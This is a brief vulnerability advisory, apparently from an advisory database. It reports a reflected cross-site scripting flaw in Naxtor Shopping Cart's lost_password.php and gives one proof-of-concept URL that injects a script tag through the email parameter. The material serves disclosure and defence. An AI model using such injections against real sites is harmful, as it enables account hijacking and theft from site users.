Naxtor Shopping Cart Lost_password.PHP Cross Site Scripting Vulnerability

Naxtor Shopping Cart Lost_password.PHP Cross Site Scripting Vulnerability

No exploit is required. An example has been provided:

http://www.example.com/lost_password.php?&email=<script>var%20xss=31337;alert(xss);</script>&reset=reset